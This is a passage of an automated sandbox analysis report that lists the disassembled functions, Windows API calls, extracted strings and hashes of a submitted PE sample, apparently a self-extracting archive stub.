                                                                                            • Part of subcall function 003D932F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 003D9355
                                                                                            • Part of subcall function 003D932F: GetNumberFormatW.KERNEL32(00000400,00000000,?,003FA154,?,?), ref: 003D93A4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLoadLocalStringSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                          • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                          • API String ID: 3227067027-1840816070
                                                                                          • Opcode ID: 4276a7f6d2ae8d96375bad21303ebef08552f7e1ac3abc1d561f94d0e701986d
                                                                                          • Instruction ID: 75b6d6c7c33f2382b8f02f6fda598cc97739d633dc4e08ffa0230fc797919a1a
                                                                                          • Opcode Fuzzy Hash: 4276a7f6d2ae8d96375bad21303ebef08552f7e1ac3abc1d561f94d0e701986d
                                                                                          • Instruction Fuzzy Hash: B6919472548309BBD622DBA0DD49FFB77ECEB4A700F04481AF689D6181D771AA05C763
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 003C7075
                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 003C71D5
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 003C71E5
                                                                                            • Part of subcall function 003C7A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 003C7AAC
                                                                                            • Part of subcall function 003C7A9D: GetLastError.KERNEL32 ref: 003C7AF2
                                                                                            • Part of subcall function 003C7A9D: CloseHandle.KERNEL32(?), ref: 003C7B01
                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 003C71F0
                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 003C72FE
                                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 003C732A
                                                                                          • CloseHandle.KERNEL32(?), ref: 003C733C
                                                                                          • GetLastError.KERNEL32(00000015,00000000,?), ref: 003C734C
                                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 003C7398
                                                                                          • DeleteFileW.KERNEL32(?), ref: 003C73C0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                                                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                          • API String ID: 3935142422-3508440684
                                                                                          • Opcode ID: 2cff93467830ec006a5ae8a02cb376c4a58959d73ec7fa59bd0d2a37b2e29ee1
                                                                                          • Instruction ID: 5a0f25cc9446c576a94acd5005b8f9152e9034454919a0b428e689c99e81797f
                                                                                          • Opcode Fuzzy Hash: 2cff93467830ec006a5ae8a02cb376c4a58959d73ec7fa59bd0d2a37b2e29ee1
                                                                                          • Instruction Fuzzy Hash: F4B1CE75904258ABDB26DF64CC45FEE77A8AF04300F14456EFD19EB282D730AE45CBA1
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog_memcmp
                                                                                          • String ID: CMT$h%u$hc%u
                                                                                          • API String ID: 3004599000-3282847064
                                                                                          • Opcode ID: 4780c529ad2aecee9327454a33fbd4dc64b7ce86a0d0165558c6f81860d9c4f6
                                                                                          • Instruction ID: 57844d98e18d9442e28301d481cc289236276e2efc5c499942e701e3f0d697db
                                                                                          • Opcode Fuzzy Hash: 4780c529ad2aecee9327454a33fbd4dc64b7ce86a0d0165558c6f81860d9c4f6
                                                                                          • Instruction Fuzzy Hash: 87325C715142849BDF1ADF64C886FEA37A5AF15300F04457EED8ADF282DB709E48CB60
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: __floor_pentium4
                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                          • API String ID: 4168288129-2761157908
                                                                                          • Opcode ID: 6c12873493d811bdf0c0133b1d7e28f3cef47f6d24e263ee6fe21dfe8b31fb4b
                                                                                          • Instruction ID: c4692ca6fae787c6f24efa3f1bac615c472147762426deaba4282af9cb1c45aa
                                                                                          • Opcode Fuzzy Hash: 6c12873493d811bdf0c0133b1d7e28f3cef47f6d24e263ee6fe21dfe8b31fb4b
                                                                                          • Instruction Fuzzy Hash: 72C23C71E046788FDB26CE29DD407EAB7B9EB84305F1542EAD44DE7280E774AE818F41
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 003C2775
                                                                                          • _strlen.LIBCMT ref: 003C2CFF
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003C2E56
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prologUnothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                                                          • String ID: CMT
                                                                                          • API String ID: 3741668355-2756464174
                                                                                          • Opcode ID: c17cf1cb79bc3a042175519fa8fa9b71182164c2d86a6ec0045652ddd260a96b
                                                                                          • Instruction ID: 0f9d617c7af141e534afbeafec2630b5d2e9c1d1f0593c8935cd008c8ed766a8
                                                                                          • Opcode Fuzzy Hash: c17cf1cb79bc3a042175519fa8fa9b71182164c2d86a6ec0045652ddd260a96b
                                                                                          • Instruction Fuzzy Hash: 8B62C0759002848FDB1ADF78C895BEA3BE1AF54300F09457EEC9ACB282DB719D45CB60
                                                                                          APIs
                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 003E5C4B
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 003E5C55
                                                                                          • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 003E5C62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                          • String ID:
                                                                                          • API String ID: 3906539128-0
                                                                                          • Opcode ID: 359d506c7a2ad18187223c6f22f34ada5d2ff9761032c116212328cc385f0f2f
                                                                                          • Instruction ID: f5b97c12f9723c342a1e75f59aec905d0759dc9ea5f83995b65bb1a0230def70
                                                                                          • Opcode Fuzzy Hash: 359d506c7a2ad18187223c6f22f34ada5d2ff9761032c116212328cc385f0f2f
                                                                                          • Instruction Fuzzy Hash: BA31C6759412289BCB22DF69DD8979DB7B8BF18310F5042DAE40CA7251E7709F858F44
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .
                                                                                          • API String ID: 0-248832578
                                                                                          • Opcode ID: f08d57fbd0e65c73af12056a407518bce83ffa3f45a4f79fc7482621d54240e2
                                                                                          • Instruction ID: 45c148d154c58c35373377fbd3aa0fff43533a74b758da1943aa1b556bd06e60
                                                                                          • Opcode Fuzzy Hash: f08d57fbd0e65c73af12056a407518bce83ffa3f45a4f79fc7482621d54240e2
                                                                                          • Instruction Fuzzy Hash: A13103718042A96FCB269E7ACC84EFB7BBDEF85314F0502A8F418D7291E6309D458B90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                                                                          • Instruction ID: 5fc40b49a8a10e69013e0049fc8ab0a0e95cfd8d3ed18f9cd20f1a41573f8b39
                                                                                          • Opcode Fuzzy Hash: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                                                                          • Instruction Fuzzy Hash: 1C022D71E006699FDF15CFA9C8806ADB7F1EF88314F25826AD919E7380D731AE41CB91
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 003D9355
                                                                                          • GetNumberFormatW.KERNEL32(00000400,00000000,?,003FA154,?,?), ref: 003D93A4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: FormatInfoLocaleNumber
                                                                                          • String ID:
                                                                                          • API String ID: 2169056816-0
                                                                                          • Opcode ID: c327e21fcbe18b79c60ac277d38ef65afb50cf4e993e56bc5f803b69a3289a85
                                                                                          • Instruction ID: 0b4b10677998eb8d9e03e725b109d0337881fb0ec238c2e116d34b36d464482c
                                                                                          • Opcode Fuzzy Hash: c327e21fcbe18b79c60ac277d38ef65afb50cf4e993e56bc5f803b69a3289a85
                                                                                          • Instruction Fuzzy Hash: 35015E75110349ABDB118F64DC05FAB77BCEF09710F004426BA08D7261D3709925CBA6
                                                                                          APIs
                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,003EE8CF,?,?,00000008,?,?,003EE56F,00000000), ref: 003EEB01
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionRaise
                                                                                          • String ID:
                                                                                          • API String ID: 3997070919-0
                                                                                          • Opcode ID: a3f769ae780762c794728baabd6770711c0fe4748b019cc7e9d240e1ab38bbdb
                                                                                          • Instruction ID: be52acf3af7f68e2ea2e4aa07d3fc38fc7cbed2cc08d64c827c341d4e8c99ec1
                                                                                          • Opcode Fuzzy Hash: a3f769ae780762c794728baabd6770711c0fe4748b019cc7e9d240e1ab38bbdb
                                                                                          • Instruction Fuzzy Hash: 85B13A312106599FDB16CF29C48AB657BE0FF45364F26865CE89ACF2E2C335E981CB40
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: gj
                                                                                          • API String ID: 0-4203073231
                                                                                          • Opcode ID: 0040ee052d10cfd86edf1c7f956a0620ee4e6055c3b0d9127b1e2a4751455c9b
                                                                                          • Instruction ID: 4062958e6e61aab6fcaa0882ff1d9ecac2ac5d8cefa1236e1ada8e3edd3cb7e3
                                                                                          • Opcode Fuzzy Hash: 0040ee052d10cfd86edf1c7f956a0620ee4e6055c3b0d9127b1e2a4751455c9b
                                                                                          • Instruction Fuzzy Hash: 53F1D2B6A083418FC748CF2DD890A2AFBE1BFC8208F15892EF498D7751D734E9458B56
                                                                                          APIs
                                                                                          • GetVersionExW.KERNEL32(?), ref: 003CA905
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: Version
                                                                                          • String ID:
                                                                                          • API String ID: 1889659487-0
                                                                                          • Opcode ID: 2929e79c62ba7e1beb47fd61f28049ca11a09dac60d0c609353645875d89357d
                                                                                          • Instruction ID: c65ba5323173b21d484fbb942dd96b93d921d1b6ad367e770b5dcf8cf01e3890
                                                                                          • Opcode Fuzzy Hash: 2929e79c62ba7e1beb47fd61f28049ca11a09dac60d0c609353645875d89357d
                                                                                          • Instruction Fuzzy Hash: 4CF090B490060D8BCB2ACF98ED83AF473B9F749314F210298D91993390D7709D80CF52
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001DBCF,003DD604), ref: 003DDBC8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          • Opcode ID: 1ad3592aaaf6f6874e8f962a997db55bdeb6c8f78da7f732b604d2841cb93b4f
                                                                                          • Instruction ID: a4c7cc8a291cf6d9bdab8fc4c6caee802fc8bc5a59f2fcbcfd4702bb1bb2e9ac
                                                                                          • Opcode Fuzzy Hash: 1ad3592aaaf6f6874e8f962a997db55bdeb6c8f78da7f732b604d2841cb93b4f
                                                                                          • Instruction Fuzzy Hash:
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8?
                                                                                          • API String ID: 0-4032827857
                                                                                          • Opcode ID: 0a5c4da40c182dbb9399aa8c3b67a15270faab7c333af27d7b8435db36aef605
                                                                                          • Instruction ID: dce9d4cb1de6b47bbe62ef5d7a32a0bf40552be18aa47692fb78961f5a67750b
                                                                                          • Opcode Fuzzy Hash: 0a5c4da40c182dbb9399aa8c3b67a15270faab7c333af27d7b8435db36aef605
                                                                                          • Instruction Fuzzy Hash: 485108319083954EC713DF29819497EBFE1AFDA314F4988ADF4D58B253C231DA46CB52
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: HeapProcess
                                                                                          • String ID:
                                                                                          • API String ID: 54951025-0
                                                                                          • Opcode ID: aeed522be6cf65469be240984371ebd1326fbff42bfacdd4e0ff714079056f4f
                                                                                          • Instruction ID: ed11ea130c9d9f5391d03cf3e457efc83732b070b5dbbbb6789b1e1add38b355
                                                                                          • Opcode Fuzzy Hash: aeed522be6cf65469be240984371ebd1326fbff42bfacdd4e0ff714079056f4f
                                                                                          • Instruction Fuzzy Hash: 9BA02230202200CFA3008F3AAF0A30C3AECFA023C0B00C03CA808C2230EB388020CB00
